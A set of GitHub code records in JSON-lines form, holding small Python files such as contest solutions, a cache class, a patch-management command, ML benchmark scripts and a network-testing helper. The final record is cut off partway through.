+{"seq_id":"24014953484","text":"# 二分答案\r\n\r\n# 问题在于:\r\n# 并不是说:对于一个点,向它运动的人超过不向它运动的人\r\n# 而是说:对于一个点,向它运动的人超过向其他点运动的人\r\n\r\n# 计数的时候必须两个坐标一起考虑\r\n\r\nT = int(input())\r\n\r\n\r\ndef solve(Q, dirs):\r\n # print(dirs)\r\n x0, y0 = 0, 0\r\n\r\n def check(x, y):\r\n cnt = 0\r\n for x0, y0, d0 in dirs:\r\n if d0 == 'N' and y > y0:\r\n cnt += 1\r\n if d0 == 'S' and y < y0:\r\n cnt += 1\r\n if d0 == 'W' and x < x0:\r\n cnt += 1\r\n if d0 == 'E' and x > x0:\r\n cnt += 1\r\n return cnt\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[0]):\r\n cnt = check(x, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x\r\n\r\n if x < Q:\r\n cnt = check(x + 1, y0)\r\n if cnt > prev:\r\n prev = cnt\r\n x0 = x + 1\r\n\r\n prev = check(x0, y0)\r\n\r\n for x, y, dir in sorted(dirs, key=lambda x: x[1]):\r\n cnt = check(x0, y)\r\n # print(x0, y0, prev, x, y, cnt)\r\n \r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y\r\n\r\n if y < Q:\r\n cnt = check(x0, y + 1)\r\n if cnt > prev:\r\n prev = cnt\r\n y0 = y + 1\r\n\r\n return str(x0) + \" \" + str(y0)\r\n\r\n\r\nfor t in range(1, T+1):\r\n P, Q = map(int, input().split())\r\n dirs = []\r\n for p in range(P):\r\n x, y, d = input().split()\r\n dirs.append([int(x), int(y), d])\r\n print(\"Case #%d: %s\" % (t, solve(Q, dirs)))\r\n","repo_name":"songzy12/GoogleCodingCompetitions","sub_path":"codejam/2019/Round 1B/Manhattan Crepe Cart.py","file_name":"Manhattan Crepe Cart.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40901202524","text":"__author__ = 'Veltarn'\r\n\r\nimport RPi.GPIO as GPIO\r\nimport time\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\nport_number = 7\r\nGPIO.setup(port_number, GPIO.IN)\r\n\r\ndef onRising(channel):\r\n '''\r\n Called whenever the hall sensor is triggered\r\n :param channel: Number of the channel\r\n :return:\r\n '''\r\n print(\"Event on \" + str(channel))\r\n\r\ndef onFalling(channel):\r\n '''\r\n Called whenever the hall sensors stop detecting something\r\n :param channel:\r\n :return:\r\n '''\r\n print(\"Nothing to detect\")\r\n\r\ndef main():\r\n\r\n GPIO.add_event_detect(port_number, GPIO.RISING, callback=onRising)\r\n\r\n try:\r\n while True:\r\n time.sleep(0.1)\r\n except KeyboardInterrupt:\r\n GPIO.cleanup()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"Veltarn/Climax","sub_path":"Tests/testhall.py","file_name":"testhall.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"70862430728","text":"import datetime\nfrom datetime import datetime\n\nclass Storage(object):\n\n def __init__(self):\n self.__data = {} # { 'default': {\"key1\":[ exp1, value1]}, 'domain2': {\"key1\":[ exp1, value1] }\n\n def set(self, name, value, datatype, expiration=None, domain=\"default\"):\n try:\n if domain not in self.__data:\n self.__data.update({domain: {}})\n self.__data[domain][name] = [value, datatype, expiration]\n return \"0\"\n except Exception as e:\n return str(e)\n\n def get(self, name, domain):\n if domain in self.__data:\n rec = self.__data[domain]\n if name in rec:\n # exp in self.__data[name][0]\n if rec[name][2]: # exp is set\n now = datetime.now().timestamp()\n if now > float(rec[name][2]):\n try:\n del rec.remove[name] # remove from cache\n except Exception as e:\n pass\n return None, None\n return rec[name][0], rec[name][1] #tuple (value, datatype)\n return None, None\n\n def delete(self, name, domain):\n try:\n if domain not in self.__data:\n return \"Domain does not exists\"\n else:\n if name not in self.__data[domain]:\n return \"Key does not exists\"\n del self.__data[domain][name]\n return \"0\"\n except Exception as e:\n return str(e)\n\n\n def reset(self):\n self.__data = {}\n return \"0\"\n\n def stats(self, started, set_hit, get_hit, get_miss):\n r = {'domains': {}, 'started': started, 'set_hit': set_hit, 'get_hit': set_hit, 'get_miss': get_miss}\n for domain in self.__data:\n r[\"domains\"][domain] = {'keys': len(self.__data[domain])}\n return str(r)\n\n # if name in self.__data:\n# # exp in self.__data[name][0]\n# if self.__data[name][0]: # exp is set\n# now = datetime.now().timestamp()\n# if now > float(self.__data[name][0]):\n# try:\n# del self.__data.remove[name] # remove from cache\n# except Exception as e:\n# pass\n# return None\n# return self.__data[name][1]\n# return None\n\n def dump(self):\n return self.__data\n\n","repo_name":"lhotakj/Kasi","sub_path":"kasi/Storage.py","file_name":"Storage.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"39931524965","text":"class Solution:\n def containsNearbyDuplicate(self, nums, k):\n store = {}\n for i in range(len(nums)):\n if nums[i] not in store:\n store[nums[i]] = []\n store[nums[i]].append(i)\n for key,v in store.items():\n if len(v) > 1:\n for i in range(1, len(v)):\n if abs(v[i-1]-v[i]) <= k:\n return True\n return False","repo_name":"mihir254/LeetCode","sub_path":"Easy/219-Contains-Duplicate-II.py","file_name":"219-Contains-Duplicate-II.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13898638298","text":"#剑指offer 类似题\n# 有两个排序的数组 A1 和 A2, 内存在 A1 的末尾有足够多的空余空间容纳 A2.\n# 请实现一个函数,把 A2中的所有数字插入 A1 中,并且所有数字是有序的\narr1 = [3, 4, 7, 9, 10]\narr2 = [1, 2, 4, 5]\n\nres = arr1 + arr2\nprint(res)\np1 = len(arr1) - 1\np2 = len(arr2) - 1\ni = len(res) - 1\nwhile p1 > 0 and p2 > 0 :\n if arr1[p1] == arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n res[i] = arr2[p2]\n i -= 1\n p1 -= 1\n p2 -= 1\n elif arr1[p1] > arr2[p2]:\n res[i] = arr1[p1]\n i -= 1\n p1 -= 1\n else:\n res[i] = arr2[p2]\n i -= 1\n p2 -= 1\n\nwhile p1 != -1:\n res[i] = arr1[p1]\n p1 -= 1\n i -= 1\nwhile p2 != -1:\n res[i] = arr2[p2]\n p2 -= 1\n i -= 1\n\nprint(res)\n\n \n ","repo_name":"jasmine2018jixun/leetcode2020","sub_path":"leetcode2019/lintcode_212_空格替换.py","file_name":"lintcode_212_空格替换.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20723265142","text":"import time\nimport json\nimport numpy as np\n\nfrom load_data import load_data\nfrom auto_ml import auto_ml\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Files\nfiles = []\nfor sim in np.arange(1, 11):\n\n files.append({\"train\": \"../data/Xy/\" + str(sim) + \"_train.csv\",\n \"test\": \"../data/Xy/\" + str(sim) + \"_test.csv\",\n \"task\": \"regression\",\n \"name\": str(sim)})\n\n# Backends\nbackends = [\"sklearn\", \"h2o\", \"tpot\"]\n\n# Settings\nruns = 10 # number of random data sets\ntime_to_run = 60 # run time for each dataset and engine in minutes\nfolds = 5 # number of folds used in cv\n\n# Loop over datasets\n#for run in [8, 9, ]:\nfor run in np.arange(runs):\n\n # Load/Sim data\n X_train, y_train, X_test, y_test = load_data(path_train=files[run][\"train\"], path_test=files[run][\"test\"])\n\n # Random Forest Benchmark\n print(\"Fitting Benchmark via Random Forest\")\n mod_rf = RandomForestRegressor(n_estimators=250)\n mod_rf.fit(X=X_train, y=y_train)\n y_hat_rf = mod_rf.predict(X=X_test)\n mse_benchmark = mean_squared_error(y_true=y_test, y_pred=y_hat_rf)\n\n # Loop over backends\n for engine in backends:\n\n # Verbose\n print(\"Starting \", engine + \" in \" + str(run), \"run\")\n\n # Start time tracking\n start_time = time.time()\n\n try:\n\n # Init model\n mod = auto_ml(backend=engine)\n mod.create_ml(run_time=time_to_run, folds=folds)\n\n # Fitting on training set\n mod.fit(X=X_train, y=y_train)\n\n # Predict on test set\n y_hat = mod.predict(X=X_test)\n\n # End time tracking\n time_elapsed = time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time))\n\n # Eval error on test set\n mse_score = mean_squared_error(y_true=y_test, y_pred=y_hat)\n\n # Results\n info = {\"run\": int(run),\n \"backend\": engine,\n \"mse_test\": mse_score,\n \"mse_benchmark\": mse_benchmark,\n \"time_elapsed\": time_elapsed}\n\n # Write log\n with open(\"../results/\" + time.strftime(\"%Y-%m-%d_%H-%M-%S\", time.gmtime(time.time())) + \"_\" + str(run) + \"_\" + str(engine) + \".json\", \"w\") as outfile:\n json.dump(info, outfile, sort_keys=True, indent=4)\n\n # Verbose\n print(\"Finished \" + engine + \" in \" + str(run) + \" run\")\n\n except (RuntimeError, TypeError, NameError):\n print(\"Error in \" + \"backend \" + engine + \" for \" + str(run), \"run\")\n\n\n\n\n","repo_name":"fabianmax/ML-Automation","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"}
+{"seq_id":"15195403998","text":"# optimizer\noptimizer = dict(type='AdamW', lr=0.00006, weight_decay=0.0001)\n# optimizer = dict(type='Adam', lr=0.001, weight_decay=0.0005)\noptimizer_config = dict()\n# learning policy\n# lr_config = dict(policy='poly', power=1.00, min_lr=1e-5, by_epoch=False)\n# lr_config = dict(\n# policy='CosineAnnealingWarmRestarts',\n# warmup='linear',\n# warmup_iters=2000,\n# warmup_ratio=1.0 / 10,\n# min_lr_ratio=1e-5)\nlr_config = dict(\n policy='CosineRestart',\n restart_weights=[1,1,1,1,1],\n periods=[3750,7500,15000,30000,60000],\n min_lr=1e-6)\n# lr_config = dict(\n# policy='CosineRestart',\n# restart_weights=[1,1,1,1,1],\n# periods=[3000,6000,12000,24000,48000],\n# min_lr=1e-6)\n# runtime settings\nrunner = dict(type='IterBasedRunner', max_iters=120000)\ncheckpoint_config = dict(by_epoch=False, interval=2000, max_keep_ckpts=20)\nevaluation = dict(interval=2000, metric='mIoU')\n","repo_name":"nytbliang/HTMANet","sub_path":"configs/_base_/schedules/schedule_80k.py","file_name":"schedule_80k.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23436845675","text":"# -*- coding: utf-8 -*-\n\"\"\"Tracks\nEach track has a fs and a duration. There are 4 kinds of tracks:\n\n1 Event - times\n2 Wave - values\n3 TimeValue - values at times, duration\n4 Partition - values between times\n\nAll track intervals are of the type [), and duration points to the next unoccupied sample == length\n\"\"\"\n\nimport logging\nfrom builtins import str\nfrom pathlib import Path\nfrom typing import List, Optional, Union\n\nimport numpy\nfrom signalworks.tracking.metatrack import MetaTrack\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n# logger.setLevel(logging.WARNING)\n# logger.setLevel(logging.ERROR)\n\nTIME_TYPE = numpy.int64\n\n\ndef convert_dtype(source, target_dtype):\n \"\"\"\n return a link (if unchanged) or copy of signal in the specified dtype (often changes bit-depth as well)\n \"\"\"\n assert isinstance(source, numpy.ndarray)\n source_dtype = source.dtype\n assert source_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"source must be a supported type\"\n assert target_dtype in (\n numpy.int16,\n numpy.int32,\n numpy.float32,\n numpy.float64,\n ), \"target must be a supported type\"\n if source_dtype == target_dtype:\n return source\n else: # conversion\n if source_dtype == numpy.int16:\n if target_dtype == numpy.int32:\n return source.astype(target_dtype) << 16\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 15)\n elif source_dtype == numpy.int32:\n if target_dtype == numpy.int16:\n return (source >> 16).astype(target_dtype) # lossy\n else: # target_dtype == numpy.float32 / numpy.float64:\n return source.astype(target_dtype) / (1 << 31)\n else: # source_dtype == numpy.float32 / numpy.float64\n M = numpy.max(numpy.abs(source))\n limit = 1 - 1e-16\n if M > limit:\n factor = limit / M\n logger.warning(\n f\"maximum float waveform value {M} is beyond [-{limit}, {limit}],\"\n f\"applying scaling of {factor}\"\n )\n source *= factor\n if target_dtype == numpy.float32 or target_dtype == numpy.float64:\n return source.astype(target_dtype)\n else:\n if target_dtype == numpy.int16:\n return (source * (1 << 15)).astype(target_dtype) # dither?\n else: # target_dtype == numpy.int32\n return (source * (1 << 31)).astype(target_dtype) # dither?\n\n\nclass Track(MetaTrack):\n default_suffix = \".trk\"\n\n def __init__(self, path):\n self._fs = 0\n self.type: Optional[str] = None\n self.min: Union[int, float, None] = None\n self.max: Union[int, float, None] = None\n self.unit: Optional[str] = None\n self.label: Optional[str] = None\n if path is None:\n path = str(id(self))\n self.path = Path(path).with_suffix(self.default_suffix)\n\n def get_time(self):\n raise NotImplementedError\n\n def set_time(self, time):\n raise NotImplementedError\n\n time = property(get_time, set_time)\n\n def get_value(self):\n raise NotImplementedError\n\n def set_value(self, value):\n raise NotImplementedError\n\n value = property(get_value, set_value)\n\n def get_fs(self):\n return self._fs\n\n def set_fs(self, _value):\n raise Exception(\"Cannot change fs, try resample()\")\n\n fs = property(get_fs, set_fs, doc=\"sampling frequency\")\n\n def get_duration(self):\n pass\n\n def set_duration(self, duration):\n raise NotImplementedError\n\n duration = property(get_duration, set_duration)\n\n def __eq__(self, other):\n raise NotImplementedError\n\n def __ne__(self, other):\n raise NotImplementedError\n\n def __len__(self):\n pass\n\n def __str__(self):\n pass\n\n def __add__(self, other):\n raise NotImplementedError\n\n @classmethod\n def read(cls, path, samplerate=None):\n # we do the imports here to avoid circular import when Wave inherits Track, and Track call Wave's function\n # we only need a function from the dependencies\n from signalworks.tracking.partition import Partition\n from signalworks.tracking.timevalue import TimeValue\n from signalworks.tracking.wave import Wave\n from signalworks.tracking.multitrack import MultiTrack\n\n \"\"\"Loads object from name, adding default extension if missing.\"\"\"\n # E = []\n suffix = Path(path).suffix\n\n with open(path, \"rb\") as fileIn:\n bufHeader = fileIn.read(38)\n if (\n (bufHeader[0:4] == b\"RIFF\")\n and (bufHeader[12:16] == b\"fmt \")\n and (bufHeader[0:5] != b\"RIFFB\")\n ):\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n elif suffix == \".tmv\":\n return TimeValue.read_tmv(path) # for now, handle nans\n elif suffix == \".lab\":\n return Partition.read(path)\n elif suffix == \".edf\":\n return MultiTrack.read_edf(path)\n elif suffix == \".xdf\":\n return MultiTrack.read_xdf(path)\n else:\n channels = None\n mmap = False\n return Wave.wav_read(path, channels, mmap)\n\n def write(self, name, *args, **kwargs):\n \"\"\"Saves object to name, adding default extension if missing.\"\"\"\n raise NotImplementedError\n\n def resample(self, fs):\n \"\"\"resample self to a certain fs\"\"\"\n raise NotImplementedError\n\n def select(self, a, b):\n \"\"\"\n return a selection of the track from a to b. a and b are in fs units.\n Times are new objects, but values are views - idea is to make a read-only section, not a copy\n \"\"\"\n raise NotImplementedError\n\n def insert(self, a, t):\n raise NotImplementedError\n\n def remove(self, a, b):\n raise NotImplementedError\n\n def copy(self, a, b):\n raise NotImplementedError\n\n def cut(self, a, b):\n t = self.copy(a, b)\n self.remove(a, b)\n return t\n\n\ndef get_track_classes() -> List[Track]:\n def all_subclasses(c):\n return c.__subclasses__() + [\n a for b in c.__subclasses__() for a in all_subclasses(b)\n ]\n\n return [obj for obj in all_subclasses(Track)]\n\n\n# TODO: class NamedEvent(_Track)\n# there hasn't been a need for it yet, but may be useful in the future\n# wonder if I can extend Event itself with optional values...\n# class NamedEvent(_Track):\n# def __init__(self, time, value, fs, duration)\n\n\n# class HetMultiTrack(MultiTrack): # may want to define common abstract class instead\n# \"\"\"\n# A dictionary containing time-synchronous tracks of equal duration, but HETEROGENOUS fs\n# \"\"\"\n\n# # this fs relates to the manner by which we time-index (possibly with float) into the multitrack object.\n# # Use 1.0 for seconds.\n# def __init__(self, mapping=dict(), fs=1.0):\n# dict.__init__(self, mapping)\n# if __debug__: # long assert - TODO: do this on mapping, and then assign\n# self.check()\n# self._fs = fs\n\n# def check(self):\n# if len(self) > 1:\n# duration = None\n# for i, (key, track) in enumerate(self.items()):\n# if duration is None:\n# duration = track.duration / track.fs\n# if track.duration / track.fs != duration:\n# raise AssertionError(\n# f\"all durations must be equal, track #{i} ('{key}') does not match track #1\"\n# )\n\n# def get_fs(self):\n# if len(self):\n# return self._fs\n# else:\n# return 0 # or raise?\n\n# def set_fs(self, fs):\n# self._fs = fs\n\n# fs = property(get_fs, set_fs, doc=\"sampling frequency of time-index\")\n\n# def select(self, a, b, keys=None):\n# assert a >= 0\n# assert a < b # or a <= b?\n# assert b <= self.duration\n# \"\"\"return a new object with all track views from time a to b\"\"\"\n# if keys is None:\n# keys = self.keys()\n# obj = type(self)()\n# for key in keys:\n# trk = self[key]\n# obj[key] = trk.select(\n# a / self._fs * trk._fs, b / self._fs * trk._fs\n# ) # untested\n# return obj\n\n# def test_pml(self):\n# import tempfile\n# tmp = tempfile.NamedTemporaryFile(prefix='test_pml_')\n# filename = tmp.name\n# tmp.close()\n# self.t.pmlwrite(filename)\n# s = Event.pmlread(filename)\n# os.unlink(filename)\n# # duration CANNOT be encoded in the file (or can it?)\n# s.duration = int(numpy.round(self.t.duration * s.fs / self.t.fs))\n# s = s.resample(self.t.fs)\n# self.assertTrue(numpy.allclose(s.time, self.t.time))\n","repo_name":"TimeViewers/signalworks","sub_path":"signalworks/tracking/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"26559230805","text":"# -*- coding: utf-8 -*-\n\n\n# Задача: вычислить 3 тикера с максимальной и 3 тикера с минимальной волатильностью в МНОГОПРОЦЕССНОМ стиле\n#\n# Бумаги с нулевой волатильностью вывести отдельно.\n# Результаты вывести на консоль в виде:\n# Максимальная волатильность:\n# ТИКЕР1 - ХХХ.ХХ %\n# ТИКЕР2 - ХХХ.ХХ %\n# ТИКЕР3 - ХХХ.ХХ %\n# Минимальная волатильность:\n# ТИКЕР4 - ХХХ.ХХ %\n# ТИКЕР5 - ХХХ.ХХ %\n# ТИКЕР6 - ХХХ.ХХ %\n# Нулевая волатильность:\n# ТИКЕР7, ТИКЕР8, ТИКЕР9, ТИКЕР10, ТИКЕР11, ТИКЕР12\n# Волатильности указывать в порядке убывания. Тикеры с нулевой волатильностью упорядочить по имени.\n#\nimport multiprocessing\n\nfrom path_sort_data import get_path, sort, output_data\n\n\nclass SecuritiesVolatility(multiprocessing.Process):\n\n def __init__(self, file_name, collector, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.file_name = file_name\n self.collector = collector\n self.securities = {}\n\n def volatility_calculation(self):\n with open(self.file_name, 'r', encoding='utf8') as file:\n prices = []\n for line in file:\n if line != 'SECID,TRADETIME,PRICE,QUANTITY\\n':\n elems = line.split(',')\n price = float(elems[2])\n security_paper = elems[0]\n prices.append(price)\n min_price = min(prices)\n max_price = max(prices)\n average_price = (max_price + min_price) / 2\n volatility = round(((max_price - min_price) / average_price) * 100, 2)\n self.securities[security_paper] = volatility\n self.collector.put(self.securities)\n\n def run(self):\n self.volatility_calculation()\n\n\nif __name__ == '__main__':\n\n securities_volatility = {}\n\n wanted_folder = 'trades'\n path = get_path(wanted_folder)\n\n collector = multiprocessing.Queue()\n data_securities = [SecuritiesVolatility(file_name=file, collector=collector) for file in path]\n\n for process in data_securities:\n process.start()\n\n for process in data_securities:\n process.join()\n\n while not collector.empty():\n data = collector.get()\n securities_volatility.update(data)\n\n data = sort(securities_volatility)\n securities_volatility = data[0]\n zero_volatility = data[1]\n output_data(securities_volatility, zero_volatility)\n# зачет!\n","repo_name":"tidml/python_base","sub_path":"lesson_012/03_volatility_with_processes.py","file_name":"03_volatility_with_processes.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18151778464","text":"#Problem 2\r\n#Kullanıcıdan 3 tane sayı alın ve en büyük sayıyı ekrana yazdırın.\r\n\r\ns1=int(input(\"1.Sayı: \"))\r\ns2=int(input(\"2.Sayı: \"))\r\ns3=int(input(\"3.Sayı: \"))\r\n\r\nif(s1>s2 and s1>s3):\r\n print(\"Sayu 1 En Büyük.\")\r\nelif(s2>s3 and s2>s1):\r\n print(\"Sayı 2 En Büyük.\")\r\nelif(s3>s2 and s3>s1):\r\n print(\"Sayu 3 En büyük.\") ","repo_name":"4Noyis/Python","sub_path":"Python/Part_2/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71302620167","text":"from quilt.command import Command\nfrom quilt.db import Db, Series\nfrom quilt.error import NoPatchesInSeries, NoAppliedPatch, UnknownPatch, \\\n QuiltError\nfrom quilt.patch import Patch\nfrom quilt.pop import Pop\nfrom quilt.signals import Signal\nfrom quilt.utils import Directory, File\n\n\nclass Delete(Command):\n\n \"\"\"Command class to delete patches\n \"\"\"\n\n deleting_patch = Signal()\n deleted_patch = Signal()\n\n def __init__(self, cwd, quilt_pc, quilt_patches):\n super(Delete, self).__init__(cwd)\n self.quilt_pc = Directory(quilt_pc)\n self.quilt_patches = Directory(quilt_patches)\n self.db = Db(quilt_pc)\n self.series = Series(quilt_patches)\n self.pop = Pop(cwd, quilt_pc)\n\n def _delete_patch(self, patch, remove=False, backup=False):\n if self.series.is_empty():\n raise NoPatchesInSeries(self.series)\n if not self.series.is_patch(patch):\n raise UnknownPatch(self.series, patch)\n\n applied = self.db.top_patch() == patch\n self.deleting_patch(patch, applied)\n\n if applied:\n self.pop._unapply_patch(patch)\n self.db = self.pop.db\n self.db.save()\n\n self.series.remove_patch(patch)\n self.series.save()\n\n patch_file = self.quilt_patches + File(patch.get_name())\n\n if remove:\n if backup:\n patch_file.copy(File(patch_file.get_name() + \"~\"))\n\n patch_file.delete_if_exists()\n\n self.deleted_patch(patch)\n\n def delete_next(self, remove=False, backup=False):\n \"\"\" Delete next unapplied patch\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n patch = self.db.top_patch()\n if patch:\n after = self.series.patch_after(patch)\n else:\n after = self.series.first_patch()\n if not after:\n raise QuiltError(\"No next patch\")\n\n self._delete_patch(after, remove=remove, backup=backup)\n\n def delete_patch(self, patch_name=None, remove=False, backup=False):\n \"\"\" Delete specified patch from the series\n If remove is True the patch file will also be removed. If remove and\n backup are True a copy of the deleted patch file will be made.\n \"\"\"\n if patch_name:\n patch = Patch(patch_name)\n else:\n patch = self.db.top_patch()\n if not patch:\n raise NoAppliedPatch(self.db)\n\n self._delete_patch(patch, remove=remove, backup=backup)\n","repo_name":"bjoernricks/python-quilt","sub_path":"quilt/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"25174028942","text":"import csv\nimport sys\nimport pydot\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn import preprocessing\nfrom sklearn.externals.six import StringIO\nclass_names=['low','medium','high']\n#Args checking\nif(len(sys.argv) is not 3):\n\tprint(\"Usage: python3 E13.py \")\n\texit()\n#Files open\ntraining=list(csv.reader(open(sys.argv[1])))\nfeature_names=training[0][1:-1]\ntraining=training[1:]\n#Training data separation\ntarget=list(map(lambda x : x[-1],training))\nle = preprocessing.LabelEncoder()\nle.fit(class_names)\n\nclass_names=le.inverse_transform(np.sort(le.transform(class_names)))\n\ntarget=le.transform(target)\n\ndata=np.array(list(map(lambda x : x[1:-1],training)))\n\n#Decision Tree Training\ntreeClas=tree.DecisionTreeClassifier()\ntreeClas.fit(data, target)\n\n#Decision Tree Plot\ndot_data = StringIO()\n\ntree.export_graphviz(treeClas, out_file=dot_data,feature_names=feature_names,class_names=class_names,filled=True, rounded=True, special_characters=True)\n\ngraph = pydot.graph_from_dot_data(dot_data.getvalue())\ngraph.write_pdf(path=sys.argv[2])\n","repo_name":"Xiul109/MachineLearningTec","sub_path":"E13.py","file_name":"E13.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16168737272","text":"'''SNAKE WATER GUN GAME'''\r\n'''IN THIS STEP WE ARE IMPORTING AN INBUILT MODULE RANDOM WHICH WILL HELP US IN RANDOMIZING THE COMPUTERS OUTPUT'''\r\nimport random\r\n'''THIS IS A MODULE FOR MAKING GUI'''\r\nimport easygui\r\ndef game(user,comp):#HERE WE ARE DEFINING A FUNCTION THAT WILL HELP US IN COMPARING THE OUTPUT OF THE USER AND THE COMPUTER AND DECIDE THE WINNER\r\n if user==comp:\r\n return None\r\n elif comp=='s':\r\n if user=='w':\r\n return False\r\n elif user=='g':\r\n return True \r\n elif comp=='w':\r\n if user=='s':\r\n return True\r\n elif user=='g':\r\n return False\r\n elif comp=='g':\r\n if user=='s':\r\n return False\r\n elif user=='w':\r\n return True #THIS PART IS THE LOGICAL PART\r\n'''NOW WE NEED TO THINK ABOUT THE COMPUTER OUTPUT '''\r\ncomp=(\"Computer's turn : Snake(s) Water(w) Gun(g)\")\r\nrandno=random.randint(1,3) #SO AFTER CALLING THE RANDOM FUNCTION WE ARE GRNERATING RANDOM NUMBERS BETWEEEN 1 AND 3 \r\nif randno==1:\r\n comp='s'\r\nelif randno==2:\r\n comp='w'\r\nelse:\r\n comp='g' #ASSIGNED THOSE VALUES TO THE COMPUTERS OUTPUT\r\n# '''TAKING INPUT FROM THE USER''' \r\nprint(\"WELCOME TO THE GAME OF SNAKE WATER AND GUN SNAKE YOU ARE AGAINST COMPUTER \\n MAY THE BETTER PLAYER WIN \") \r\nuser=input(\"User's turn: Snake(s) Water(w) Gun(g): \")\r\nprint(f\"Computer chose {comp}\")\r\nprint(f\"user chose {user}\")\r\nf=game(user,comp)\r\nif f==None:\r\n easygui.ynbox('ITS A DRAW !')\r\nelif f:\r\n easygui.ynbox('YOU WIN COMPUTER NOOBDA')\r\nelse:\r\n easygui.ynbox('YOU LOOSE KOI NA')\r\n\r\n","repo_name":"mayankfulara/Snake-Water-Gun-Game","sub_path":"SnakeWate.py","file_name":"SnakeWate.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42327018291","text":"\"\"\" Common get functions for segment-routing \"\"\"\r\n\r\n# Python\r\nimport re\r\nimport logging\r\n\r\n# pyATS\r\nfrom pyats.utils.objects import find, R\r\n\r\n# Genie\r\nfrom genie.libs.sdk.libs.utils.normalize import GroupKeys\r\nfrom genie.metaparser.util.exceptions import SchemaEmptyParserError\r\n\r\n# Running-Config\r\nfrom genie.libs.sdk.apis.iosxe.running_config.get import (\r\n get_running_config_section_dict,\r\n)\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\ndef get_segment_routing_policy_active_path_hop_labels(device, policy,\r\n policy_dict=None, ignore_first_label=False):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n policy ('str'): Policy name\r\n policy_dict ('dict'): Policy dict from parser output\r\n IOSXE Parser - ShowSegmentRoutingTrafficEngPolicy\r\n cmd - show segment-routing traffic-eng policy all\r\n ignore_first_label (`bool`): flag to ignore first label\r\n Returns:\r\n labels ('list'): Hop labels\r\n \"\"\"\r\n labels = []\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy)\r\n if policy_dict is None:\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return labels\r\n else:\r\n out = policy_dict\r\n\r\n # Check explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P.*)',\r\n 'path_type','explicit',\r\n '(?P.*)','(?P.*)',\r\n 'status','(?P.*)'])\r\n explicit = find([out], reqs, filter_=False, all_keys=True)\r\n if explicit:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=explicit, all_keys=True)\r\n \r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','explicit',\r\n '(?P.*)','(?P.*)',\r\n 'hops','(?P.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n # Check dynamic path if no active path in explicit path\r\n reqs = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P.*)',\r\n 'path_type','dynamic',\r\n 'status','(?P.*)'])\r\n dynamic = find([out], reqs, filter_=False, all_keys=True)\r\n if dynamic:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=dynamic, all_keys=True)\r\n\r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = 